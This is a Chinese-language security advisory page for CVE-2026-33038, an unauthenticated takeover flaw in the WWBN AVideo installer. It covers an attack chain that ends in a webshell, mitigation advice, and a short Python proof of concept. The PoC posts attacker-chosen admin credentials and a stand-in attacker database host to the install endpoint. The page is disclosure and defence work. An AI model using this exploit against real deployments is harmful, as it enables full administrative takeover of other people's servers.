CVE-2026-33038 CVSS 8.1 高危

CVE-2026-33038 WWBN AVideo未授权应用接管漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33038

漏洞类型

未授权访问

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo开源视频平台25.0及以下版本存在严重安全漏洞。攻击者可利用`install/checkConfiguration.php`端点，在无需认证的情况下接管应用程序。该接口仅检查配置文件是否存在，便允许通过POST请求执行数据库初始化、管理员创建及配置文件写入。在未初始化的部署中，远程攻击者可利用此漏洞使用受控凭据完成安装，进而获得系统的完全管理权限，造成严重的数据泄露和系统控制风险。

技术细节

该漏洞源于WWBN AVideo安装流程中的验证逻辑缺陷。具体地，`install/checkConfiguration.php`文件负责应用程序的初始化过程，包括数据库连接配置、管理员账户生成以及`videos/configuration.php`配置文件的写入。然而，该端点未实施严格的身份验证机制，仅通过检查`videos/configuration.php`是否已存在来判断安装状态。如果目标环境尚未完成安装（即配置文件不存在），远程攻击者可以向该端点发送特制的HTTP POST请求。请求中包含攻击者控制的数据库连接信息（如指向恶意数据库或合法数据库）以及管理员用户名和密码。服务器接收请求后，会执行初始化操作，将攻击者设置的信息写入系统，从而赋予攻击者最高管理权限。由于CVSS向量显示无需用户交互且网络可达，该漏洞极易被自动化工具大规模扫描利用。

攻击链分析

STEP 1

侦察

攻击者扫描互联网寻找未初始化的WWBN AVideo实例，特征是访问install目录返回正常响应或videos/configuration.php文件缺失。

STEP 2

利用

攻击者向install/checkConfiguration.php端点发送特制的恶意POST请求，其中包含攻击者自定义的管理员账号密码和数据库连接信息。

STEP 3

初始化与接管

目标服务器接收请求并执行安装逻辑，将攻击者提供的信息写入配置文件并创建管理员账户，导致攻击者获得系统最高权限。

STEP 4

持久化

攻击者使用新创建的管理员账户登录后台，上传Webshell或进一步控制服务器，维持对系统的长期访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
target_url = "http://target.com/install/checkConfiguration.php"

# Attacker controlled payload for installation
# This data includes the admin credentials and database configuration
payload = {
    "adminName": "hacker",
    "adminPass": "StrongHackerPass123!",
    "adminPassConfirm": "StrongHackerPass123!",
    "host": "attacker-controlled-db.com",
    "user": "dbuser",
    "pass": "dbpass",
    "dbname": "avideo_db",
    "createDb": 1
}

try:
    # Send POST request to trigger the installation
    response = requests.post(target_url, data=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Successfully sent installation payload.")
        print("[+] Check if the configuration file was created and admin account was set.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 25.0

防御指南

临时缓解措施

对于无法立即升级的用户，建议在Web服务器层面（如Nginx或Apache）配置访问控制规则，严格禁止外部IP访问`install/`目录，或者确认系统已完成安装并确保`videos/configuration.php`文件存在且不可写。此外，应检查现有的管理员账户，确认无异常新增账户。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表